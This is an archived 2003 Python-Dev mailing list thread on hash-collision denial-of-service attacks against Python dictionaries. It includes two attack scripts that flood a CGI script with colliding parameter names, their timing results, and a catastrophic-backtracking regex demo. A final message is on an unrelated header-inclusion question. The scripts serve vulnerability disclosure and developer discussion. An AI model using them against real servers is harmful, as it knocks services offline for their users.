> On Sat, 31 May 2003 09:17:16 -0400, "Phillip J. Eby" <pje@telecommunity.com> writes:
> 
> > At 05:02 PM 5/30/03 -0500, Scott A Crosby wrote:
> 
> > But based on the discussion so far, I'm not sure I see how this attack
> > would produce an effect that was dramatically disproportionate to the
> > amount of data transmitted.
> 
> I apologize for not having this available earlier, but a corrected
> file of 10,000 inputs is now available and shows the behavior I
> claimed. (Someone else independently reimplemented the attack and has
> sent me a corrected set for python.) With 10,000 inputs, python
> requires 19 seconds to process instead of .2 seconds. A file of half
> the size requires 4 seconds, showing the quadratic behavior, as with
> the case of perl. (Benchmarked on a P2-450) I thus predict that twice
> the inputs would take about 80 seconds.
> 
> I can only guess what python applications might experience an
> interesting impact from this, so I'll be silent. However, here are the
> concrete benchmarks.

the CGI module was mentioned earlier as a possible "problem area" for this
attack, I wrote a script that demonstrates this, using Scott's list of
hash-colliding strings.  I do see quadratic growth in runtime.  When runnng
the attack on mailman, however, I don't see such a large runtime, and the
growth in runtime appears to be linear.  This may be because the mailman
installation is running on 2.1 (?) and requires a different set of attack
strings.

I used the cgi.py "self-test" script (the one you get when you run cgi.py
*as* a cgi script) on the CGIHTTPServer.py server, and sent a long URL
of the form
	test.cgi?x=1&<colliding key 1>=1&<colliding key 2>=1&...
I looked at the size of the URL, the size of the response, and the time to
transfer the response.

My system is a mobile Pentium III running at 800MHz, RedHat 9, Python
2.2.2.

The mailman testing system is a K6-2 running at 350MHz, RedHat 7.1, Python
2.1.

In the results below, the very fast times and low reply sizes are due
to the fact that the execve() call fails for argv+envp>128kb.  This
limitation might not exist if the CGI was POSTed, or running as fcgi,
mod_python, or another system which does not pass the GET form contents
in the environnment.

Here are the results, for various query sizes:
########################################################################
# Output 1: Running attack in listing 1 on cgi.py
# Parameters in query: 0
Length of URL: 40
Length of contents: 2905
Time for request: 0.537268042564

# Parameters in query: 1
Length of URL: 64
Length of contents: 3001
Time for request: 0.14549601078

# Parameters in query: 10
Length of URL: 307
Length of contents: 5537
Time for request: 0.151428103447

# Parameters in query: 100
Length of URL: 2737
Length of contents: 31817
Time for request: 0.222425937653

# Parameters in query: 1000
Length of URL: 27037
Length of contents: 294617
Time for request: 4.47611808777

# Parameters in query: 2000
Length of URL: 54037
Length of contents: 586617
Time for request: 18.8749380112

# Parameters in query: 4800
Length of URL: 129637
Length of contents: 1404217
Time for request: 106.951847911

# Parameters in query: 5000
Length of URL: 135037
Length of contents: 115
Time for request: 0.516644954681

# Parameters in query: 10000
Length of URL: 270037 Length of contents: 115 Time for request: 1.01809692383

When I attempted to run the attack against Apache 1.3/Mailman, any
moderately-long GET requests provoked an Apache error message.

########################################################################
# Listing 1: test_cgi.py
import urllib, time

def time_url(url):
	t = time.time()
	u = urllib.urlopen(url)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of contents:", len(contents)
	print contents[:200]
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (0, 1, 10, 100, 1000, 2000, 4800, 5000, 10000):
	print "# Parameters in query:", i
	url = URL+"?x"
	url = url + "=1&".join(items[:i])
	time_url(url)
########################################################################

I re-wrote the script to use POST instead of GET, and again ran it on
cgi.py and mailman.  For some reason, using 0 or 1 items aginst
CGIHTTPServer.py seemed to hang.

########################################################################
# Output 2: Running attack in listing2 on cgi.py
# Parameters in query: 10
Length of URL: 38
Length of data: 272
Length of contents: 3543
Time for request: 0.314235925674

# Parameters in query: 100
Length of URL: 38
Length of data: 2702
Length of contents: 13894
Time for request: 0.218624949455

# Parameters in query: 1000
Length of URL: 38
Length of data: 27002
Length of contents: 117395
Time for request: 2.20617306232

# Parameters in query: 2000
Length of URL: 38
Length of data: 54002
Length of contents: 232395
Time for request: 9.92248606682

# Parameters in query: 5000
Length of URL: 38
Length of data: 135002
Length of contents: 577396
Time for request: 57.3930220604

# Parameters in query: 10000
Length of URL: 38
Length of data: 270002
Length of contents: 1152396
Time for request: 238.318212986

########################################################################
# Output 3: Running attack in listing2 on mailman
# Parameters in query: 10
Length of URL: 44
Length of data: 272
Length of contents: 852
Time for request: 0.938691973686

# Parameters in query: 100
Length of URL: 44
Length of data: 2702
Length of contents: 852
Time for request: 0.819067001343

# Parameters in query: 1000
Length of URL: 44
Length of data: 27002
Length of contents: 852
Time for request: 1.13541901112

# Parameters in query: 2000
Length of URL: 44
Length of data: 54002
Length of contents: 852
Time for request: 1.59714698792

# Parameters in query: 5000
Length of URL: 44
Length of data: 135002
Length of contents: 852
Time for request: 3.12452697754

# Parameters in query: 10000
Length of URL: 44
Length of data: 270002
Length of contents: 852
Time for request: 5.72900700569

########################################################################
# Listing 2: attack program using POST for longer URLs

import urllib2, time

def time_url(url, data):
	t = time.time()
	u = urllib2.urlopen(url, data)
	contents = u.read()
	t1 = time.time()
	print "Length of URL:", len(url)
	print "Length of data:", len(data)
	print "Length of contents:", len(contents)
	print "Time for request:", t1-t
	print

#URL="http://www.example.com/mailman/subscribe/test"
URL="http://localhost:8000/cgi-bin/test.cgi"

items = [line.strip() for line in open("python-attack").readlines()]
for i in (10, 100, 1000, 2000, 5000, 10000):
	print "# Parameters in query:", i
	data = "x" + "=1&".join(items[:i]) + "\r\n\r\n"
	time_url(URL, data)


From tim.one@comcast.net  Sat May 31 19:28:25 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 14:28:25 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <5.1.0.14.0.20030531090628.02567ad0@mail.telecommunity.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEGBEIAB.tim.one@comcast.net>

[Phillip J. Eby]
> ...
> or at least warning the developers of alternatives to CGI (e.g. Zope,
> Quixote, SkunkWeb, CherryPy, etc.) that alternate hashes might be a good
> idea.

Don't know about SkunkWeb or CherryPy etc, but Zope and Quixote apps can use
ZODB's BTrees for mappings.  Insertion and lookup in a BTree have worst-case
log-time behavior, and no "bad" sets of keys exist for them.  The Buckets
forming the leaves of BTrees are vulnerable, though:  provoking
quadratic-time behavior in a Bucket only requires inserting keys in
reverse-sorted order, and sometimes apps use Buckets directly when they
should be using BTrees.

Using a data structure appropriate for the job at hand is usually a good
idea <wink>.



From python@rcn.com  Sat May 31 19:34:13 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sat, 31 May 2003 14:34:13 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
References: <LNBBLJKPBEHFEDALKOLCAEEGEIAB.tim.one@comcast.net> <200305310041.h4V0fsF20796@pcp02138704pcs.reston01.va.comcast.net> <20030531130503.GA16185@unpythonic.net> <200305311655.h4VGtLk21998@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003b01c327a3$3c30f5e0$125ffea9@oemcomputer>

> > On Fri, May 30, 2003 at 08:41:54PM -0400, Guido van Rossum wrote:
> > > Of course, such programs are already vulnerable to changes in the hash
> > > implementation between Python versions (which has happened before).
> > 
> > Is there at least a guarantee that the hashing algorithm won't change in a
> > bugfix release?  For instance, can I depend that
> > python222 -c 'print hash(1), hash("a")'
> > python223 -c 'print hash(1), hash("a")'
> > will both output the same thing, even if
> > python23 -c 'print hash(1), hash("a")'
> > and
> > python3000 -c 'print hash(1), hash("a")'
> > may print something different?
> 
> That's a reasonable assumption, yes.  We realize that changing the
> hash algorithm is a feature change, even if it is a very subtle one.

For Scott's proposal to work, it would have to change the hash
value on every invocation of Python.  If not, colliding keys can
be found with a Monte Carlo method.

Raymond Hettinger



From tim.one@comcast.net  Sat May 31 19:50:01 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 14:50:01 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <20030531130503.GA16185@unpythonic.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGDEIAB.tim.one@comcast.net>

[Jeff Epler]
> Is there at least a guarantee that the hashing algorithm won't change
> in a bugfix release?

Guido said "yes" weakly, but the issue hasn't come up in recent times.  In
the past we've changed the hash functions for at least strings, tuples, and
floats, based on systematic weaknesses uncovered by real-life ordinary data.
OTOH, there's a requirement that, for objects of types that can be used as
dict keys, two objects that compare equal must deliver equal hash codes, so
people creating (mostly) number-like or (not sure if anyone does this)
string-like types have to duplicate the hash codes Python delivers for
builtin numbers and strings that compare equal to objects of their types.
For example, the author of a Rational class should arrange for

    hash(Rational(42, 1))

to deliver the same result as

    hash(42) == hash(42L) == hash(42.0) == hash(complex(42.0, 0.0))

Such code would break if we changed the int/long/float/complex hashes for
inputs that compare equal to integers.

Tedious exercise for the reader:  find a set of bad datetime objects in 2.3
("bad" in the sense of their hash codes colliding; on a box where hash()
returns a 32-bit int, there must be collisions, since datetime objects have
way more than 32 independent bits of state).



From tim.one@comcast.net  Sat May 31 20:27:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 15:27:29 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydwug814ac.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGGEIAB.tim.one@comcast.net>

[Scott Crosby]
> ...
> Also, I'd like to thank Tim Peters for telling me about the potential
> of degradation that regular expressions may offer.

I'm acutely aware of that one because it burns people regularly.  These
aren't cases of hostile input, they're cases of innocently "erroneous"
input.  After maybe a year of experience, people using a backtracking regexp
engine usually figure out how to write a regexp that doesn't go
resource-crazy when parsing strings that *do* match.  Those are the inputs
the program expects.  But all inputs can suffers errors, and a regexp that
works well when the input matches can still go nuts trying to match a
non-matching string, consuming an exponential amount of time trying an
exponential number of futile backtracking possibilities.

Here's an unrealistic but tiny example, to get the flavor across:

"""
import re
pat = re.compile('(x+x+)+y')

from time import clock as now

for n in range(10, 100):
    print n,
    start = now()
    pat.search('x' * n + 'y')
    print now() - start,
    start = now()
    pat.search('x' * n)
    print now() - start
"""

The fixed regexp here is

    (x+x+)+y

and we search strings of the form

    xxx...xxxy      which do match
    xxx...xxx       which don't match

The matching cases take time linear in the length of the string, but it's so
fast it's hard to see the time going up at all until the string gets very
large.  The failing cases take time exponential in the length of the string.
Here's sample output:

10 0.000155885951826 0.00068891533549
11 1.59238337887e-005 0.0013736401884
12 1.76000268191e-005 0.00268777552423
13 2.43047989406e-005 0.00609379976198
14 2.51428954558e-005 0.0109438642954
15 3.4361957123e-005 0.0219815954005
16 3.10095710622e-005 0.0673058549423
17 3.26857640926e-005 0.108308050755
18 3.35238606078e-005 0.251965336328
19 3.68762466686e-005 0.334131480581
20 3.68762466685e-005 0.671073936875
21 3.60381501534e-005 1.33723327578
22 3.60381501534e-005 2.68076149449
23 3.6038150153e-005 5.37420757974
24 3.6038150153e-005 10.7601803584
25 3.52000536381e-005

I killed the program then, as I didn't want to wait 20+ seconds for the
25-character string to fail to match.

The horrid problem here is that it takes a highly educated eye to look at
that regexp and see in advance that it's going to have "fast when it
matches, possibly horrid when it doesn't match" behavior -- and this is a
dead easy case to analyze.  In a regexp that slobbers on across multiple
lines, with 5 levels of group nesting, my guess is that no more than 1
programmer in 1000 has even a vague idea how to start looking for such
problems.



From tim.one@comcast.net  Sat May 31 21:21:44 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 16:21:44 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydznl4yon0.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGHEIAB.tim.one@comcast.net>

[Tim]
>> ...
>> Overall, though, I'd welcome a faster string hash, and I agree that
>> Python's isn't particularly zippy.

[Scott Crosby]
> Actually, at least on x86, it is faster than perl. On other platforms,
> it may be somewhat slower.

Perl's isn't particularly zippy either.  I believe that, given heroic coding
effort, a good universal hash designed for speed can get under 1 cycle per
byte hashed on a modern Pentium.  Python's and Perl's string hashes aren't
really in the same ballpark.

> ...
> Yes, I am aware of the problems with the UHASH code. Unfortunately, I
> am not a hash function designer, that code is not mine, and I only use
> it as a black box.
>
> I also consider all code, until verified otherwise, to potentially
> suffer from endianness, alignment, and 32/64 bit issues. Excluding
> alignment issues (which I'm not sure whether to say that its OK to
> fail on strange alignments or not) it has passed *my* self-tests on
> big endian and 64 bit.

Then who's going to vet the code on a Cray T3 (etc, etc, etc, etc)?  This
isn't a nag, it cuts to the heart of what a language like Python can do:
the x-platform behavior of Python's current string hash is easy to
understand, relying only on what the C standard demands.  It's doing (only)
one evil thing, relying on the unspecified (by C) semantics of what happens
when a signed long multiply overflows.  Python runs on just about every
platform on Earth, and that hasn't been a problem so far.  If it becomes a
problem, we can change the accumulator to unsigned long, and then C would
specify what happens.  There ends the exhaustive discusson of all
portability questions about our current code <wink>.

> ...
>> + Some Python apps run for months, and universal hashing doesn't
>>   remove the possibility of quadratic-time behavior.  If I can poke
>>   at a long-running app and observe its behavior, over time I can
>>   deduce a

> I argued on linux-kernel with someone else that this was extremely
> unlikely. It requires the latency of a collision/non-collision being
> noticable over a noisy system, network stack, and system.

So you have in mind only apps accessed across a network?  And then, for
example, discounting the possiblity that a bitter sysadmin opens an
interactive Python shell on the box, prints out a gazillion (i, hash(i))
pairs and mails them to himself for future mischief?

> In almost all cases, for short inputs, the cost of a single L2 cache
> miss far exceeds that of hashing.

If the user is restricted to short inputs, provoking quadratic-time behavior
doesn't matter.

> A more serious danger is an application that leaks actual hash values.

So ever-more operations become "dangerous".  Programmers will never keep
this straight, and Python isn't a straightjacket language.  I still vote
that apps for which this matters use an *appropriate* data structure
instead -- Python isn't an application, it's a language for programming
applications.

> ...
> Agreed, many have realized over the years that hash tables can have
> quadratic behavior in an adversarial environment.

People from real-time backgrounds are much more paranoid than that, and
perhaps the security-conscious could learn a lot from them.  For example,
you're not going to find a dynamic hash table in a real-time app, because
they can't take a chance on bad luck either.  To them, "an adversary" is
just an unlucky roll of the dice, and they can't tolerate it.

> It isn't hidden. Cormen, Lieserson, and Rivest even warn about this in
> their seminal algorithms textbook in 1991.

Knuth warned about it a lot earlier than that <wink -- but see his summary
of hashing in TAoCP, Vol 3 -- it gives strong warnings).

> It *is* obvious when thought of, but the reason I was able to ship out
> so many vulnerability reports yesterday was because few actually *have*
> thought of that deterministic worst-case when writing their programs. I
> predict this trend to continue.

I appreciate that, and I expect it to continue too.  I expect a better
solution would be for more languages to offer a choice of containers with
different O() behaviors.  In C it's hard to make progress because the
standard language comes with so little, and so many "portable" C libraries
aren't.  The C++ world is in better shape, constrained more by the
portability of standard C++ itself.  There's less excuse for Python or Perl
programmers to screw up in these areas, because libraries written in Python
and Perl are very portable, and there are lot of 'em to chose from.

> I like hash tables a lot, with UH, their time bounds are randomized,
> but are pretty tight and the constant factors far exceed those of
> balanced binary trees.

Probably, but have you used a tree implementation into which the same heroic
level of analysis and coding effort has been poured?  The typical portable-C
balanced tree implementation should be viewed as a worst-case bound on how
fast balanced trees can actually work.

Recently, heroic efforts have been poured into Judy tries, which may be both
faster and more memory-efficent than hash tables in many kinds of apps:

    http://judy.sourceforge.net/

The code for Judy tries makes UHASH look trivial, though.  OTOH, provided
the Judy code actually works on your box, and there aren't bugs hiding in
its thousands of lines of difficult code, relying on a Judy "array" for good
worst-case behavior isn't a matter of luck.



From dave@boost-consulting.com  Sat May 31 23:11:05 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 31 May 2003 18:11:05 -0400
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
In-Reply-To: <m34r3baxna.fsf@mira.informatik.hu-berlin.de> (
 =?iso-8859-1?q?Martin_v._L=F6wis's_message_of?= "31 May 2003 18:28:25
 +0200")
References: <uvfvrrxow.fsf@boost-consulting.com>
 <m34r3baxna.fsf@mira.informatik.hu-berlin.de>
Message-ID: <ullwmkbra.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. L=F6wis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Anyway, the point is that I'd like to have the rule changed to "You
>> have to include Python.h or xxxx.h before any system header" where
>> xxxx.h is one of the other existing headers #included in Python.h that
>> is responsible for setting up whatever macros cause this
>> inclusion-order requirement in the first place (preferably not
>> LongObject.h!)
>
> If I understand correctly, you want to follow the rule "I want to
> change things as long it continues to work for me".=20

Then you don't understand correctly.

> For that, you don't need any permission. If it works for you, you
> can ignore any rules you feel uncomfortable with.
>
> The rule is there for people who don't want to understand the
> specific details of system configuration. If you manage to get a
> consistent configuration in a different way, just go for it. You
> should make sure then that your users can't run into problems,
> though.

I can't make sure that my users can't run into problems without
understanding everything about Python and Posix which causes the rule
to exist in the first place (and I don't), and continuously monitoring
Python into the future to make sure that the distribution of Posix
configuration information across its headers doesn't change in a way
that invalidates previous assumptions.

The current rule doesn't work for me, but I'd like to be following
_some_ sanctioned rule to reduce the chance of problems today and in
the future. I'm making an educated guess that the rule is much
more-sweeping than Python development needs it to be.  Isn't there
some Python internal configuration header which can be #included first
and which will accomplish all the same things as far as system-header
inclusion order is concerned?

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com